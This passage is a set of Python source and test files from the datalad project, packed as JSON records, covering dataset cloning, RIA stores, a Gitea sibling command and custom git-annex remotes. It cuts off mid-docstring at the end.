LocalIO()\n create_store(io, storepath, '1')\n lcl_url = \"ria+{}\".format(get_local_file_url(str(storepath)))\n create_ds_in_store(io, storepath, ds.id, '2', '1')\n ds.create_sibling_ria(lcl_url, \"store\", new_store_ok=True)\n ds.push('.', to='store')\n\n\n # now, remove annex/ tree from store in order to see, that clone\n # doesn't cause annex to recreate it.\n store_loc, _, _ = get_layout_locations(1, storepath, ds.id)\n annex = store_loc / 'annex'\n rmtree(str(annex))\n assert_false(annex.exists())\n\n clone_url = get_local_file_url(str(storepath), compatibility='git') + \\\n '#{}'.format(ds.id)\n clone(\"ria+{}\".format(clone_url), clonepath)\n\n # no need to test the cloning itself - we do that over and over in here\n\n # bare repo in store still has no local annex:\n assert_false(annex.exists())\n\n\n@slow # 17sec on Yarik's laptop\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\n@serve_path_via_http\ndef test_inherit_src_candidates(lcl=None, storepath=None, url=None):\n lcl = Path(lcl)\n storepath = Path(storepath)\n # dataset with a subdataset\n ds1 = Dataset(lcl / 'ds1').create()\n ds1sub = ds1.create('sub')\n # a different dataset into which we install ds1, but do not touch its subds\n ds2 = Dataset(lcl / 'ds2').create()\n ds2.clone(source=ds1.path, path='mysub')\n\n # we give no dataset a source candidate config!\n # move all dataset into the store\n for d in (ds1, ds1sub, ds2):\n _move2store(storepath, d)\n\n # now we must be able to obtain all three datasets from the store\n riaclone = clone(\n 'ria+{}#{}'.format(\n # store URL\n url,\n # ID of the root dataset\n ds2.id),\n lcl / 'clone',\n )\n # what happens is the the initial clone call sets a source candidate\n # config, because it sees the dataset coming from a store\n # all obtained subdatasets get the config inherited on-clone\n datasets = riaclone.get('.', get_data=False, recursive=True, result_xfm='datasets')\n # we get two subdatasets\n eq_(len(datasets), 2)\n for ds in datasets:\n eq_(ConfigManager(dataset=ds, source='branch-local').get(\n 'datalad.get.subdataset-source-candidate-200origin'),\n 'ria+%s#{id}' % url)\n\n\n@skip_if_no_network\n@with_tempfile()\ndef test_ria_http_storedataladorg(path=None):\n # can we clone from the store w/o any dedicated config\n ds = clone('ria+http://store.datalad.org#{}'.format(datalad_store_testds_id), path)\n ok_(ds.is_installed())\n eq_(ds.id, datalad_store_testds_id)\n\n\n@skip_if_on_windows # see gh-4131\n# Ephemeral clones cannot use adjusted mode repos\n@skip_if_adjusted_branch\n@with_tree(tree={\n 'ds': {\n 'test.txt': 'some',\n 'subdir': {'testsub.txt': 'somemore'},\n },\n})\n@with_tempfile\n@with_tempfile\n@with_tempfile\n@with_tempfile\n@with_tempfile\ndef test_ephemeral(origin_path=None, bare_path=None,\n clone1_path=None, clone2_path=None,\n clone3_path=None, clone4_path=None):\n can_symlink = has_symlink_capability()\n\n file_test = Path('ds') / 'test.txt'\n file_testsub = Path('ds') / 'subdir' / 'testsub.txt'\n\n origin = Dataset(origin_path).create(force=True)\n origin.save()\n\n def check_clone(clone_):\n # common checks to do on a clone\n eq_(clone_.config.get(\"annex.private\"), \"true\")\n if can_symlink:\n clone_annex = (clone_.repo.dot_git / 'annex')\n ok_(clone_annex.is_symlink())\n ok_(clone_annex.resolve().samefile(origin.repo.dot_git / 'annex'))\n if not clone_.repo.is_managed_branch():\n # TODO: We can't properly handle adjusted branch yet\n eq_((clone_.pathobj / file_test).read_text(), 'some')\n eq_((clone_.pathobj / file_testsub).read_text(), 'somemore')\n\n # 1. clone via path\n clone1 = clone(origin_path, clone1_path, reckless='ephemeral')\n check_clone(clone1)\n\n # 2. clone via file-scheme URL\n clone2 = clone('file://' + Path(origin_path).as_posix(), clone2_path,\n reckless='ephemeral')\n check_clone(clone2)\n\n # 3. add something to clone1 and push back to origin availability from\n # clone1 should not be propagated (we declared 'here' dead to that end)\n\n (clone1.pathobj / 'addition.txt').write_text(\"even more\")\n clone1.save()\n origin.config.set(\"receive.denyCurrentBranch\", \"updateInstead\",\n scope=\"local\")\n # Note, that the only thing to test is git-annex-dead here,\n # if we couldn't symlink:\n clone1.push(to=DEFAULT_REMOTE, data='nothing' if can_symlink else 'auto')\n\n if external_versions['cmd:annex'] >= \"8.20210428\":\n # ephemeral clones are private (if supported by annex version). Despite\n # the push, clone1's UUID doesn't show up in origin\n recorded_locations = origin.repo.call_git(['cat-file', 'blob',\n 'git-annex:uuid.log'],\n read_only=True)\n assert_not_in(clone1.config.get(\"annex.uuid\"), recorded_locations)\n\n if not origin.repo.is_managed_branch():\n # test logic cannot handle adjusted branches\n eq_(origin.repo.get_hexsha(), clone1.repo.get_hexsha())\n res = origin.repo.whereis(\"addition.txt\")\n if can_symlink:\n # obv. present in origin, but this is not yet known to origin:\n eq_(res, [])\n res = origin.repo.fsck()\n assert_result_count(res, 3, success=True)\n # TODO: Double check whether annex reports POSIX paths o windows!\n eq_({str(file_test), str(file_testsub), \"addition.txt\"},\n {r['file'] for r in res})\n # now origin knows:\n res = origin.repo.whereis(\"addition.txt\")\n eq_(res, [origin.config.get(\"annex.uuid\")])\n\n # 4. ephemeral clone from a bare repo\n runner = GitWitlessRunner()\n runner.run(['git', 'clone', '--bare', origin_path, bare_path])\n runner.run(['git', 'annex', 'init'], cwd=bare_path)\n\n eph_from_bare = clone(bare_path, clone3_path, reckless='ephemeral')\n can_symlink = has_symlink_capability()\n\n if can_symlink:\n # Bare repo uses dirhashlower by default, while a standard repo uses\n # dirhashmixed. Symlinking different object trees doesn't really work.\n # Don't test that here, since this is not a matter of the \"ephemeral\"\n # option alone. We should have such a setup in the RIA tests and test\n # for data access there.\n # Here we only test for the correct linking.\n eph_annex = eph_from_bare.repo.dot_git / 'annex'\n ok_(eph_annex.is_symlink())\n ok_(eph_annex.resolve().samefile(Path(bare_path) / 'annex'))\n\n # 5. ephemeral clone using relative path\n # https://github.com/datalad/datalad/issues/7469\n with chpwd(op.dirname(origin_path)):\n clone4 = clone(op.basename(origin_path), op.basename(clone4_path), reckless='ephemeral')\n check_clone(clone4)\n\n\n@with_tempfile(mkdir=True)\ndef test_clone_unborn_head(path=None):\n ds_origin = Dataset(op.join(path, \"a\")).create()\n repo = ds_origin.repo\n managed = repo.is_managed_branch()\n\n # The setup below is involved, mostly because it's accounting for adjusted\n # branches. The scenario itself isn't so complicated, though:\n #\n # * a checked out default branch with no commits\n # * a (potentially adjusted) \"abc\" branch with commits.\n # * a (potentially adjusted) \"chooseme\" branch whose tip commit has a\n # more recent commit than any in \"abc\".\n (ds_origin.pathobj / \"foo\").write_text(\"foo content\")\n ds_origin.save(message=\"foo\")\n for res in repo.for_each_ref_(fields=\"refname\"):\n ref = res[\"refname\"]\n if DEFAULT_BRANCH in ref:\n repo.update_ref(ref.replace(DEFAULT_BRANCH, \"abc\"), ref)\n repo.call_git([\"update-ref\", \"-d\", ref])\n repo.update_ref(\"HEAD\",\n \"refs/heads/{}\".format(\n \"adjusted/abc(unlocked)\" if managed else \"abc\"),\n symbolic=True)\n abc_ts = int(repo.format_commit(\"%ct\"))\n repo.call_git([\"checkout\", \"-b\", \"chooseme\", \"abc~1\"])\n if managed:\n repo.adjust()\n (ds_origin.pathobj / \"bar\").write_text(\"bar content\")\n with set_date(abc_ts + 1):\n ds_origin.save(message=\"bar\")\n # Make the git-annex branch the most recently updated ref so that we test\n # that it is skipped.\n with set_date(abc_ts + 2):\n ds_origin.drop(\"bar\", reckless='kill')\n ds_origin.repo.checkout(DEFAULT_BRANCH, options=[\"--orphan\"])\n\n ds = clone(ds_origin.path, op.join(path, \"b\"))\n # We landed on the branch with the most recent commit, ignoring the\n # git-annex branch.\n branch = ds.repo.get_active_branch()\n eq_(ds.repo.get_corresponding_branch(branch) or branch,\n \"chooseme\")\n eq_(ds_origin.repo.get_hexsha(\"chooseme\"),\n ds.repo.get_hexsha(\"chooseme\"))\n # In the context of this test, the clone should be on an adjusted branch if\n # the source landed there initially because we're on the same file system.\n eq_(managed, ds.repo.is_managed_branch())\n\n\n@with_tempfile(mkdir=True)\ndef test_clone_unborn_head_no_other_ref(path=None):\n ds_origin = Dataset(op.join(path, \"a\")).create(annex=False)\n ds_origin.repo.call_git([\"update-ref\", \"-d\",\n \"refs/heads/\" + DEFAULT_BRANCH])\n with swallow_logs(new_level=logging.WARNING) as cml:\n clone(source=ds_origin.path, path=op.join(path, \"b\"))\n assert_in(\"could not find a branch with commits\", cml.out)\n\n\n@with_tempfile(mkdir=True)\ndef test_clone_unborn_head_sub(path=None):\n ds_origin = Dataset(op.join(path, \"a\")).create()\n ds_origin_sub = Dataset(op.join(path, \"a\", \"sub\")).create()\n managed = ds_origin_sub.repo.is_managed_branch()\n ds_origin.save(message=\"foo\")\n sub_repo = ds_origin_sub.repo\n # As with test_clone_unborn_head(), the setup below is complicated mostly\n # because it's accounting for adjusted branches, but the scenario itself\n # isn't too complicated:\n #\n # * a submodule's HEAD points to a checked out branch with no commits\n # while a (potentially adjusted) \"other\" branch has commits\n #\n # * the parent repo has the tip of \"other\" as the last recorded state\n for res in sub_repo.for_each_ref_(fields=\"refname\"):\n ref = res[\"refname\"]\n if DEFAULT_BRANCH in ref:\n sub_repo.update_ref(ref.replace(DEFAULT_BRANCH, \"other\"), ref)\n sub_repo.call_git([\"update-ref\", \"-d\", ref])\n sub_repo.update_ref(\n \"HEAD\",\n \"refs/heads/{}\".format(\n \"adjusted/other(unlocked)\" if managed else \"other\"),\n symbolic=True)\n # END complicated handling for adjusted branches\n ds_origin.save()\n ds_origin_sub.repo.checkout(DEFAULT_BRANCH, options=[\"--orphan\"])\n\n ds_cloned = clone(source=ds_origin.path, path=op.join(path, \"b\"))\n ds_cloned_sub = ds_cloned.get(\n \"sub\", result_xfm=\"datasets\", return_type=\"item-or-list\")\n\n branch = ds_cloned_sub.repo.get_active_branch()\n eq_(ds_cloned_sub.repo.get_corresponding_branch(branch) or branch,\n \"other\")\n # In the context of this test, the clone should be on an adjusted branch if\n # the source landed there initially because we're on the same file system.\n eq_(managed, ds_cloned_sub.repo.is_managed_branch())\n\n\n@xfail_buggy_annex_info\n@skip_if_no_network\n@with_tempfile\ndef test_gin_cloning(path=None):\n # can we clone a public ds anoynmously from gin and retrieve content\n ds = clone('https://gin.g-node.org/datalad/datalad-ci-target', path)\n ok_(ds.is_installed())\n annex_path = op.join('annex', 'two')\n git_path = op.join('git', 'one')\n eq_(ds.repo.file_has_content(annex_path), False)\n eq_(ds.repo.is_under_annex(git_path), False)\n result = ds.get(annex_path)\n assert_result_count(result, 1)\n assert_status('ok', result)\n eq_(result[0]['path'], op.join(ds.path, annex_path))\n ok_file_has_content(op.join(ds.path, annex_path), 'two\\n')\n ok_file_has_content(op.join(ds.path, git_path), 'one\\n')\n\n\n# TODO: git-annex-init fails in the second clone call below when this is\n# executed under ./tools/eval_under_testloopfs.\n@skip_if_adjusted_branch\n@with_tree(tree={\"special\": {\"f0\": \"0\"}})\n@serve_path_via_http\n@with_tempfile(mkdir=True)\ndef test_fetch_git_special_remote(url_path=None, url=None, path=None):\n url_path = Path(url_path)\n path = Path(path)\n ds_special = Dataset(url_path / \"special\").create(force=True)\n ds_special.save()\n ds_special.repo.call_git([\"update-server-info\"])\n\n clone_url = url + \"special/.git\"\n ds_a = clone(clone_url, path / \"a\")\n ds_a.repo.call_annex(\n [\"initremote\", \"special\", \"type=git\", \"autoenable=true\",\n \"location=\" + clone_url])\n\n # Set up a situation where a file is present only on the special remote,\n # and its existence is known only to the special remote's git-annex branch.\n (ds_special.pathobj / \"f1\").write_text(\"1\")\n ds_special.save()\n ds_special.repo.call_git([\"update-server-info\"])\n\n ds_a.repo.fetch(DEFAULT_REMOTE)\n ds_a.repo.merge(f\"{DEFAULT_REMOTE}/{DEFAULT_BRANCH}\")\n\n ds_b = clone(ds_a.path, path / \"other\")\n ds_b.get(\"f1\")\n ok_(ds_b.repo.file_has_content(\"f1\"))\n\n\n@skip_if_adjusted_branch\n@skip_if_no_network\n@with_tempfile(mkdir=True)\ndef test_nonuniform_adjusted_subdataset(path=None):\n # https://github.com/datalad/datalad/issues/5107\n topds = Dataset(Path(path) / \"top\").create()\n subds_url = 'https://github.com/datalad/testrepo--basic--r1'\n topds.clone(\n source='https://github.com/datalad/testrepo--basic--r1',\n path='subds')\n eq_(topds.subdatasets(return_type='item-or-list')['gitmodule_url'],\n subds_url)\n\n\n@with_tempfile\ndef test_clone_recorded_subds_reset(path=None):\n path = Path(path)\n ds_a = create(path / \"ds_a\")\n ds_a_sub = ds_a.create(\"sub\")\n (ds_a_sub.pathobj / \"foo\").write_text(\"foo\")\n ds_a.save(recursive=True)\n (ds_a_sub.pathobj / \"bar\").write_text(\"bar\")\n ds_a_sub.save()\n\n ds_b = clone(ds_a.path, path / \"ds_b\")\n ds_b.get(\"sub\")\n assert_repo_status(ds_b.path)\n sub_repo = Dataset(path / \"ds_b\" / \"sub\").repo\n branch = sub_repo.get_active_branch()\n eq_(ds_b.subdatasets()[0][\"gitshasum\"],\n sub_repo.get_hexsha(\n sub_repo.get_corresponding_branch(branch) or branch))\n\n\n@with_tempfile\ndef test_clone_git_clone_opts(path=None):\n path = Path(path)\n ds_a = create(path / \"ds_a\", annex=False)\n\n repo_a = ds_a.repo\n repo_a.commit(msg=\"c1\", options=[\"--allow-empty\"])\n repo_a.checkout(DEFAULT_BRANCH + \"-other\", [\"-b\"])\n repo_a.commit(msg=\"c2\", options=[\"--allow-empty\"])\n repo_a.tag(\"atag\")\n\n ds_b = clone(ds_a.path, path / \"ds_b\",\n git_clone_opts=[f\"--branch={DEFAULT_BRANCH}\",\n \"--single-branch\", \"--no-tags\"])\n repo_b = ds_b.repo\n eq_(repo_b.get_active_branch(), DEFAULT_BRANCH)\n eq_(set(x[\"refname\"] for x in repo_b.for_each_ref_(fields=\"refname\")),\n {f\"refs/heads/{DEFAULT_BRANCH}\",\n f\"refs/remotes/{DEFAULT_REMOTE}/{DEFAULT_BRANCH}\"})\n\n\n@with_tempfile\n@with_tempfile\ndef test_clone_url_mapping(src_path=None, dest_path=None):\n src = create(src_path)\n dest = Dataset(dest_path)\n # check that the impossible doesn't work\n assert_raises(IncompleteResultsError, clone, 'rambo', dest_path)\n # rather than adding test URL mapping here, consider\n # test_url_mapping_specs(), it is cheaper there\n\n # anticipate windows test paths and escape them\n escaped_subst = (r',rambo,%s' % src_path).replace('\\\\', '\\\\\\\\')\n for specs in (\n # we can clone with a simple substitution\n {'datalad.clone.url-substitute.mike': escaped_subst},\n # a prior match to a dysfunctional URL doesn't impact success\n {\n 'datalad.clone.url-substitute.no': ',rambo,picknick',\n 'datalad.clone.url-substitute.mike': escaped_subst,\n }):\n try:\n with patch.dict(dest.config._merged_store, specs):\n clone('rambo', dest_path)\n finally:\n dest.drop(what='all', reckless='kill', recursive=True)\n\n # check submodule config impact\n dest.create()\n with patch.dict(dest.config._merged_store,\n {'datalad.clone.url-substitute.mike': escaped_subst}):\n dest.clone('rambo', 'subds')\n submod_rec = dest.repo.get_submodules()[0]\n # we record the original-original URL\n eq_(submod_rec['gitmodule_datalad-url'], 'rambo')\n # and put the effective one as the primary URL\n eq_(submod_rec['gitmodule_url'], Path(src_path).as_posix())\n\n\n_nomatch_map = {\n 'datalad.clone.url-substitute.nomatch': (\n ',nomatch,NULL',\n )\n}\n_windows_map = {\n 'datalad.clone.url-substitute.win': (\n r',C:\\\\Users\\\\datalad\\\\from,D:\\\\to',\n )\n}\n\n\ndef test_url_mapping_specs():\n from datalad.core.distributed.clone_utils import _map_urls\n cfg = ConfigManager()\n for m, i, o in (\n # path redirect on windows\n (_windows_map,\n r'C:\\Users\\datalad\\from',\n r'D:\\to'),\n # test standard github mapping, no pathc needed\n ({},\n 'https://github.com/datalad/testrepo_gh/sub _1',\n 'https://github.com/datalad/testrepo_gh-sub__1'),\n # trailing slash is not mapped\n ({},\n 'https://github.com/datalad/testrepo_gh/sub _1/',\n 'https://github.com/datalad/testrepo_gh-sub__1/'),\n # and on deep subdataset too\n ({},\n 'https://github.com/datalad/testrepo_gh/sub _1/d/sub_- 1',\n 'https://github.com/datalad/testrepo_gh-sub__1-d-sub_-_1'),\n # test that the presence of another mapping spec doesn't ruin\n # the outcome\n (_nomatch_map,\n 'https://github.com/datalad/testrepo_gh/sub _1',\n 'https://github.com/datalad/testrepo_gh-sub__1'),\n # verify OSF mapping, but see\n # https://github.com/datalad/datalad/issues/5769 for future\n # implications\n ({},\n 'https://osf.io/q8xnk/',\n 'osf://q8xnk'),\n ):\n with patch.dict(cfg._merged_store, m):\n eq_(_map_urls(cfg, [i]), [o])\n" }, { "alpha_fraction": 0.5585106611251831, "alphanum_fraction": 0.5604448914527893, "avg_line_length": 38.769229888916016, "blob_id": "2c07eae1d11574959b05f637a24b6e88bc39a816", "content_id": "37ff4bc6378e735c5926f9483ee10f55ae93affb", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2068, "license_type": "permissive", "max_line_length": 84, "num_lines": 52, "path": "/datalad/core/local/tests/test_results.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test result handling\"\"\"\n\nfrom datalad.interface.utils import generic_result_renderer\nfrom datalad.tests.utils_pytest import (\n assert_in,\n swallow_outputs,\n)\nfrom datalad.utils import on_windows\n\n\ndef test_generic_result_renderer():\n # a bunch of bad cases of results\n testcases = [\n # an empty result will surface\n ({}, ['<action-unspecified>(<status-unspecified>)']),\n # non-standard status makes it out again\n (dict(status='funky'), ['<action-unspecified>(funky)']),\n # just an action result is enough to get some output\n (dict(action='funky'), ['funky(<status-unspecified>)']),\n # a plain path produces output, although\n (dict(path='funky'), ['<action-unspecified>(<status-unspecified>): funky']),\n # plain type makes it through\n (dict(type='funky'),\n ['<action-unspecified>(<status-unspecified>): (funky)']),\n # plain message makes it through\n (dict(message='funky', error_message='extra-funky'),\n ['<action-unspecified>(<status-unspecified>): [funky] [extra-funky]']),\n ]\n if on_windows:\n testcases.extend([\n # if relpath'ing is not possible, takes the path verbatim\n (dict(path='C:\\\\funky', refds='D:\\\\medina'),\n ['<action-unspecified>(<status-unspecified>): C:\\\\funky']),\n ])\n else:\n testcases.extend([\n (dict(path='/funky/cold/medina', refds='/funky'),\n ['<action-unspecified>(<status-unspecified>): cold/medina']),\n ])\n for result, contenttests in testcases:\n with swallow_outputs() as cmo:\n generic_result_renderer(result)\n for ctest in contenttests:\n assert_in(ctest, cmo.out)\n" }, { "alpha_fraction": 0.5833786129951477, "alphanum_fraction": 0.5859134793281555, "avg_line_length": 35.09803771972656, "blob_id": "44ac96e57158449201f9d09c755c8d8b2b1bdb19", "content_id": "21aa81b78c9d6d010cbc3a6391eec7e4bf77a360", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5523, "license_type": "permissive", "max_line_length": 87, "num_lines": 153, "path": "/datalad/distributed/create_sibling_gitea.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"High-level interface for creating a publication target on a Gitea instance\n\"\"\"\n\nimport logging\n\nimport requests\n\nfrom datalad.distributed.create_sibling_ghlike import _create_sibling\nfrom datalad.distributed.create_sibling_gogs import _GOGS\nfrom datalad.distribution.dataset import datasetmethod\nfrom datalad.interface.base import (\n Interface,\n build_doc,\n eval_results,\n)\n\nlgr = logging.getLogger('datalad.distributed.create_sibling_gitea')\n\n\nclass _Gitea(_GOGS):\n \"\"\"Customizations for the Gitea platform\"\"\"\n name = 'gitea'\n fullname = 'Gitea'\n response_code_unauthorized = 401\n extra_remote_settings = {\n # first make sure that annex doesn't touch this one\n # but respect any existing config\n 'annex-ignore': 'true',\n }\n\n def repo_create_response(self, r):\n \"\"\"\n At present the only difference from the GHlike implementation\n is the detection of an already existing via a proper 409 response.\n \"\"\"\n try:\n response = r.json()\n except Exception as e:\n lgr.debug('Cannot get JSON payload of %s [%s]' , r, e)\n response = {}\n lgr.debug('%s responded with %s %s', self.fullname, r, response)\n if r.status_code == requests.codes.created:\n return dict(\n status='ok',\n preexisted=False,\n # perform some normalization\n reponame=response.get('name'),\n private=response.get('private'),\n clone_url=response.get('clone_url'),\n ssh_url=response.get('ssh_url'),\n html_url=response.get('html_url'),\n # and also return in full\n host_response=response,\n )\n elif r.status_code == requests.codes.conflict and \\\n 'already exist' in response.get('message', ''):\n return dict(\n status='impossible',\n message='repository already exists',\n preexisted=True,\n )\n elif r.status_code in (self.response_code_unauthorized,\n requests.codes.forbidden):\n return dict(\n status='error',\n message=('unauthorized: %s', response.get('message')),\n )\n # make sure any error-like situation causes noise\n r.raise_for_status()\n # catch-all\n raise RuntimeError(f'Unexpected host response: {response}')\n\n\n@build_doc\nclass CreateSiblingGitea(Interface):\n \"\"\"Create a dataset sibling on a Gitea site\n\n Gitea is a lightweight, free and open source code hosting solution with\n low resource demands that enable running it on inexpensive devices like\n a Raspberry Pi.\n\n This command uses the main Gitea instance at https://gitea.com as the\n default target, but other deployments can be used via the 'api'\n parameter.\n\n In order to be able to use this command, a personal access token has to be\n generated on the platform (Account->Settings->Applications->Generate Token).\n\n This command can be configured with\n \"datalad.create-sibling-ghlike.extra-remote-settings.NETLOC.KEY=VALUE\" in\n order to add any local KEY = VALUE configuration to the created sibling in\n the local `.git/config` file. NETLOC is the domain of the Gitea instance to\n apply the configuration for.\n This leads to a behavior that is equivalent to calling datalad's\n ``siblings('configure', ...)``||``siblings configure`` command with the\n respective KEY-VALUE pair after creating the sibling.\n The configuration, like any other, could be set at user- or system level, so\n users do not need to add this configuration to every sibling created with\n the service at NETLOC themselves.\n\n .. versionadded:: 0.16\n \"\"\"\n\n _params_ = _Gitea.create_sibling_params\n _params_['api']._doc = \"\"\"\\\n URL of the Gitea instance without a 'api/<version>' suffix\"\"\"\n\n @staticmethod\n @datasetmethod(name='create_sibling_gitea')\n @eval_results\n def __call__(\n reponame,\n *,\n dataset=None,\n recursive=False,\n recursion_limit=None,\n name='gitea',\n existing='error',\n api='https://gitea.com',\n credential=None,\n access_protocol='https',\n publish_depends=None,\n private=False,\n description=None,\n dry_run=False):\n\n yield from _create_sibling(\n platform=_Gitea(\n api,\n credential,\n require_token=not dry_run,\n token_info=f'Visit {api}/user/settings/applications '\n 'to create a token'),\n reponame=reponame,\n dataset=dataset,\n recursive=recursive,\n recursion_limit=recursion_limit,\n name=name,\n existing=existing,\n access_protocol=access_protocol,\n publish_depends=publish_depends,\n private=private,\n description=description,\n dry_run=dry_run,\n )\n" }, { "alpha_fraction": 0.6586794257164001, "alphanum_fraction": 0.6586794257164001, "avg_line_length": 38.95744705200195, "blob_id": "b13fdb5a50432f37e55328597b641f9454c45f9f", "content_id": "a11d05e7ccf1fe9e250809c8ff52695dd722a3fe", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1878, "license_type": "permissive", "max_line_length": 87, "num_lines": 47, "path": "/datalad/customremotes/ria_remote.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "from datalad.customremotes.main import main as super_main\nfrom datalad.distributed.ora_remote import ORARemote\nfrom datalad.support.annexrepo import AnnexRepo\n\n\nclass DeprecatedRIARemote(ORARemote):\n \"\"\"This is a shim for backwards compatibility with the old and archived\n git-annex-ria-remote, which the current ORA remote is based on. Providing\n this remote allows datasets that are configured with the old name (and the\n respective config names) to still work.\n However, this is intended to be somewhat temporary and be replaced by\n another implementation that actually migrates from ria to ora once we\n settled for an approach.\n \"\"\"\n\n def __init__(self, annex):\n super().__init__(annex)\n\n def initremote(self):\n self.message(\"special remote type 'ria' is deprecated. Consider \"\n \"migrating to 'ora'.\", type='info')\n super().initremote(self)\n\n def _load_local_cfg(self):\n \"\"\"Overwrite _load_local_cfg in order to initialize attributes with\n deprecated 'ria' configs if they exist and then go on to let 'super' do\n it's thing\"\"\"\n self._repo = AnnexRepo(self.gitdir)\n self.storage_host = \\\n self._repo.config.get(f\"annex.ria-remote.{self.name}.ssh-host\")\n self.store_base_path = \\\n self._repo.config.get(f\"annex.ria-remote.{self.name}.base-path\")\n self.force_write = \\\n self._repo.config.get(f\"annex.ria-remote.{self.name}.force-write\")\n self.ignore_remote_config = \\\n self._repo.config.get(f\"annex.ria-remote.{self.name}.ignore-remote-config\")\n super()._load_local_cfg()\n\n\ndef main():\n \"\"\"cmdline entry point\"\"\"\n super_main(\n cls=DeprecatedRIARemote,\n remote_name='ria',\n description=\\\n \"transport file content to and from datasets hosted in RIA stores\",\n )\n" }, { "alpha_fraction": 0.6150519251823425, "alphanum_fraction": 0.6183391213417053, "avg_line_length": 35.125, "blob_id": "64ef61b07caeec2a8dbdf8a6dea54ec9dc4cab00", "content_id": "e90d90e8de350ea3ccb0ffed9c4c4d16607b4b7a", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5780, "license_type": "permissive", "max_line_length": 79, "num_lines": 160, "path": "/datalad/customremotes/base.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Base classes to custom git-annex remotes (e.g. extraction from archives)\"\"\"\n\nfrom __future__ import absolute_import\n\n__docformat__ = 'restructuredtext'\n\n\nimport logging\nfrom collections import Counter\n\nlgr = logging.getLogger('datalad.customremotes')\n\nfrom annexremote import (\n RemoteError,\n UnsupportedRequest,\n)\nfrom datalad.customremotes import SpecialRemote\n\nURI_PREFIX = \"dl\"\n\n\nclass AnnexCustomRemote(SpecialRemote):\n # default properties\n COST = 100\n AVAILABILITY = \"local\"\n\n def __init__(self, annex): # , availability=DEFAULT_AVAILABILITY):\n super().__init__(annex)\n # TODO self.info = {}, self.configs = {}\n\n # OPT: a counter to increment upon successful encounter of the scheme\n # (ATM only in gen_URLS but later could also be used in other\n # requests). This would allow to consider schemes in order of\n # decreasing success instead of arbitrary hardcoded order\n self._scheme_hits = Counter({s: 0 for s in self.SUPPORTED_SCHEMES})\n\n @classmethod\n def _get_custom_scheme(cls, prefix):\n \"\"\"Helper to generate custom datalad URL prefixes\n \"\"\"\n # prefix which will be used in all URLs supported by this custom remote\n # https://tools.ietf.org/html/rfc2718 dictates \"URL Schemes\" standard\n # 2.1.2 suggests that we do use // since all of our URLs will define\n # some hierarchical structure. But actually since we might encode\n # additional information (such as size) into the URL, it will not be\n # strictly conforming it. Thus we will not use //\n return \"%s+%s\" % (URI_PREFIX, prefix) # if .PREFIX else '')\n\n # Helper methods\n def gen_URLS(self, key):\n \"\"\"Yield URL(s) associated with a key, and keep stats on protocols.\"\"\"\n nurls = 0\n for scheme, _ in self._scheme_hits.most_common():\n scheme_ = scheme + \":\"\n scheme_urls = self.annex.geturls(key, scheme_)\n if scheme_urls:\n # note: generator would cease to exist thus not asking\n # for URLs for other schemes if this scheme is good enough\n self._scheme_hits[scheme] += 1\n for url in scheme_urls:\n nurls += 1\n yield url\n self.annex.debug(\"Processed %d URL(s) for key %s\", nurls, key)\n\n # Protocol implementation\n def initremote(self):\n pass\n\n def prepare(self):\n pass\n\n def transfer_store(self, key, local_file):\n raise UnsupportedRequest('This special remote cannot store content')\n\n def remove(self, key):\n raise RemoteError(\"Removal of content from urls is not possible\")\n\n def getcost(self):\n return self.COST\n\n def getavailability(self):\n return self.AVAILABILITY\n\n\n# this function only has anecdotal value and is not used anywhere\ndef generate_uuids():\n \"\"\"Generate UUIDs for our remotes. Even though quick, for\n consistency pre-generated and recorded in consts.py\"\"\"\n import uuid\n return {\n remote: str(uuid.uuid5(\n uuid.NAMESPACE_URL,\n 'http://datalad.org/specialremotes/%s' % remote))\n for remote in {'datalad', 'datalad-archives'}\n }\n\n\ndef init_datalad_remote(repo, remote, encryption=None, autoenable=False,\n opts=[]):\n \"\"\"Initialize datalad special remote\"\"\"\n from datalad.consts import DATALAD_SPECIAL_REMOTES_UUIDS\n lgr.info(\"Initializing special remote %s\", remote)\n remote_opts = [\n 'encryption=%s' % str(encryption).lower(),\n 'type=external',\n 'autoenable=%s' % str(bool(autoenable)).lower(),\n 'externaltype=%s' % remote\n ]\n # use unique uuid for our remotes\n # This should help with merges of disconnected repos etc\n # ATM only datalad/datalad-archives is expected,\n # so on purpose getitem\n remote_opts.append('uuid=%s' % DATALAD_SPECIAL_REMOTES_UUIDS[remote])\n return repo.init_remote(remote, remote_opts + opts)\n\n\ndef ensure_datalad_remote(repo, remote=None,\n encryption=None, autoenable=False):\n \"\"\"Initialize and enable datalad special remote if it isn't already.\n\n Parameters\n ----------\n repo : AnnexRepo\n remote : str, optional\n Special remote name. This should be one of the values in\n datalad.consts.DATALAD_SPECIAL_REMOTES_UUIDS and defaults to\n datalad.consts.DATALAD_SPECIAL_REMOTE.\n encryption, autoenable : optional\n 